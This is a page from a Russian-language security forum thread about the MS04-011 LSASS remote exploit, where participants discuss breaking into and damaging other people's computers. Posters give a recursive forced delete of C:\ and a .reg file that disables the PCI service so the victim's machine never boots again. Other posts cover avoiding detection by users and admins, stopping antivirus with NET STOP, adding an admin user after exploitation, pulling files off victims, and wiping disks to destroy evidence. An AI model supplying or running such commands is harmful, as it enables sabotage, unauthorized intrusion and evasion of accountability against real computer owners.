Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 12 13 14 15 16 ... 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
Третий день думают  , тупые ну тупые [IMG]http://www.securitylab.ru/forum/smileys/smiley17.gif[/IMG]
 
2Задорнов:
Хорошо, что ты хоть у нас умный есть, а то пропали бы все.
 
Пацаны помогите плз. залеc к одному уроду  пишу типо - del c:\*.* а он мне - Продолжить [Y(да)/N(нет)]? y
 я иму типа - y  канешна  "у"  и ни чё ни происходит всё типо на месте осталось, памагите плз очень надо таго урода наказать .
 
2 Гость
ну насмешил сотри пару файликов ntldr и ntdetect.com
ну а остальное так по мелочи по каталогам *.*
 
Ны вы долбo~бы!
c:
cd\
del *.* /q /s /f
И ждём....
 
Ok но Команда Del не есть гуд - слишком открыто и долго шуршит диском и всякие подсавщики типа э-э .. могут догадаться. Есть способ проще и эффективней.
В блокноте создать файл - f.reg  с таким тектстом (пробел межда первой и второй строками):

REGEDIT 4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PCI]
"Start"=DWORD:00000004

кинуть его например в  C:\Windows  и выполнить :

cd c:\windows
regedit.exe /s f.reg

всё - на машине отключается сервис PCI и после перезагрузки КОМП БОЛЬШЕ НЕ ЗАГРУЗИТСЯ.
 
Как ни говорите, а все-таки профилактический потенциал данного эксплоита огромен! [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
Рисую ситуацию: домашняя сеть на две дюжины компов, юзвери по большей части - полные чайники, и я в качестве местного администратора...  о какой безопасности может быть речь?! ленятся даже антивирус поставить (главная отмазка у них - "антивирус тормозит игры"), а всякие заплатки тем более. Уже запарился всякую заразу выуживать - по локалке гуляет как в зоопарке...
Скачал данный эксплоит - устроил парочке юзверей показательную демонстрацию с последующим разъяснением... вы бы видели какая паника началась! [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] через три дня абсолютно все (!!!) сидели с нужными заплатками, антивирусом и фаерволлом...
 
Цитата
culibin пишет:
И насчет совета №10560203 гнать всех приходящих с претензией куда подальше. Не советую. Дороже выйдет.
Особенно когда на руках у пришедшего логи снифа, файрвола, ИДСки и все это подперто логами провайдера, ...
5. Посещаем "больного" с юристом, с кучей логов и группой поддержки. Ну а дальше в лучших российских традициях получаем с него гонорар или привлекаем к отработке

Вот я бы пришедшего ко мне с логами "..снифа, файрвола, ИДСки и все это подперто логами провайдера.." послал бы куда подальше т.к. по настоящему "компетентные органы" с логами сами ни к кому НЕ ХОДЯТ ... надо просто поплотнее закрыть дверь и затереть нафиг винт как главный "вещь-док" - все остальные "логи" без винта это пустое место - поскольку взлом мог быть произведён кем-то другим через твою тачку !
А на счёт "..Посещаем "больного" с юристом, с кучей логов и группой поддержки..." то это вообще ярко выраженный синдром сезонного обострения хронической шизофрении.
 
ЫГЫ тока бы сканер к ниму припаяли и reverse шелл
и в линь импортировали
был бы как КАНт прекрасно!!
 
Люди, сабж (процесс NTVDM) грузит атакуемый хост вплоть до 98% процессорного времени. Есть ли какие-нить способы уменьшить загрузку? Комп то мощный, 1,7ГГЦ, но пользователь не выключает его неделю, могут "запалить".
Или посоветуйте плиз, можно ли прибить в конце "сеанса связи" этот процесс. Или на худой конец, как перезагрузить не вызывая подозрений или выключить удаленный хост?
Еще вопрос, может ли админ локалки (все действия делаю в ней) увидеть мои действия с сабжем не входя на атакуемый хост?
И еще вопросец, почему то стандартный telnet после нескольких команд виснет. Приходится юзать nc.
 
qazw
посмотри
netmon.exe (системная утилита на сервере)
а если из пакета System Management Server [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
ЗЫ: официальный снифер от мелкософта
PPS если обычные хабы (не свич) то весь трафик видно
//ну очень полезный утиль для изучения трафика в сети
 
Цитата
Virtual пишет:
qazw
посмотри
netmon.exe (системная утилита на сервере)
а если из пакета System Management Server [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
ЗЫ: официальный снифер от мелкософта
PPS если обычные хабы (не свич) то весь трафик видно
//ну очень полезный утиль для изучения трафика в сети
как раз большинство - свитчи. Карочи, если можно, поподробнее.
А когда заливать на удаленку софт - антивири там ругаются?
 
qazw
антивири всегда ругаются, на это есть: NET STOP
Если Свичи то трафик физически не виден
 
ок! спасибо! только все равно придется тренироваться на "кошках", т.е. на своей тачке.

может кто подскажет, как стандартными средствами винды прибить прожорливый процесс (NTVDM), (net stop показывает только сервисы)? и скорее всего, запланировав через at.
Или может быть есть хорошая консольная прога управления процессами? ссылку, если не жалко.
 
Так еще вопрос насчет телнета....нашел машыну...но Делаю коннект он пишет

Подключение к хх.хх.хх.хх...Не удалось открыть подключение к этому узлу на порт 1234

Подключение не установлено так как конечный компютер отверг запрос на подключение
 
;) Прибил бы заодно и процесс services....службу workstation....проще всего это сделать нажав кнопку power ;)
 
в ХР есть хорошая вещч tasklist taskill
но частеьнко из эксплойта не запускаются
(путь решения: эксплойт-новый пользователь-в группу админ-новая консоль под ентим пользователем-коннект к консоли-творим что хотим)
 
how can i get lsass exploit binary version?
 
2divino
пройдись по топику были ссылки
 
!!!Помогите!!!
Люди подскажите как с машины жертвы скопировать любой фаил к себе на винт... И что для этого надо сделать???
Страницы: Пред. 1 ... 12 13 14 15 16 ... 19 След.
Читают тему